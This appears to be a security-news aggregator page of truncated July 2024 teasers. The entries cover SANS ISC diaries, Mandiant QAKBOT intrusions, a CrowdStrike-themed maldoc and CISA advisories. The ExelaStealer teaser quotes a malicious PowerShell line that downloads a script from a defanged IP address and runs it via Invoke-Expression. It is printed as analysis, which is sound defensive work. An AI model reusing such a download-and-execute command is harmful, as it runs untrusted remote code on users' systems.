Written by: Josh Murchie, Ashley Pearson, Joseph Pisano, Jake Nicastro, Joshua Shilko, Raymond Leong Overview In mid-2022, Mandiant's Managed Defense detected multiple intrusions involving QAKBOT, leading to the deployment of BEACON coupled with other pre-ransomware
Continue ReadingMonth: July 2024
ISC Stormcast For Monday, July 29th, 2024 https://isc.sans.edu/podcastdetail/9072, (Mon, Jul 29th)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Continue Reading
Quickie: Password Cracking & Energy, (Sun, Jul 28th)
When Johannes talked about my diary entry "Protected OOXML Spreadsheets" on his StormCast podcast, he mentioned that I privately shared data on the power consumption of my desktop with a NVIDIA GeForce RTX 3080 GPU when
Continue ReadingCrowdStrike Outage Themed Maldoc, (Mon, Jul 29th)
I found a malicious Word document with VBA code using the CrowdStrike outage for social engineering purposes. It's an .ASD file (AutoRecover file). My tool oledump.py can analyze it: Before I dive into the VBA code,
Continue ReadingCreate Your Own BSOD: NotMyFault, (Sat, Jul 27th)
With all the Blue Screen Of Death screenshots we saw lately, I got the idea to write about Sysinternals' tool NotMyFault. Say that you want to practice handling BSODs, or that you need to document and
Continue ReadingExelaStealer Delivered “From Russia With Love”, (Fri, Jul 26th)
Some simple PowerShell scripts might deliver nasty content if executed by the target. I found a very simple one (with a low VT score of 8/65): $webclient = New-Object System.Net.WebClient $webclient.Headers.Add("X-Requested-With", "PowerShell") $script = $webclient.DownloadString("hxxp://147[.]45[.]159[.]206/open.ps1") Invoke-Expression
Continue ReadingISC Stormcast For Friday, July 26th, 2024 https://isc.sans.edu/podcastdetail/9070, (Fri, Jul 26th)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Continue ReadingCISA Releases Two Industrial Control Systems Advisories
CISA released two Industrial Control Systems (ICS) advisories on July 25, 2024. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-24-207-01 Siemens SICAM Products ICSA-24-207-02 Positron Broadcast Signal Processor CISA
Continue ReadingNorth Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs
Summary The U.S. Federal Bureau of Investigation (FBI) and the following authoring partners are releasing this Cybersecurity Advisory to highlight cyber espionage activity associated with the Democratic People’s Republic of Korea (DPRK)’s Reconnaissance General Bureau (RGB)
Continue ReadingSiemens SICAM Products
As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, please see Siemens' ProductCERT Security Advisories
Continue Reading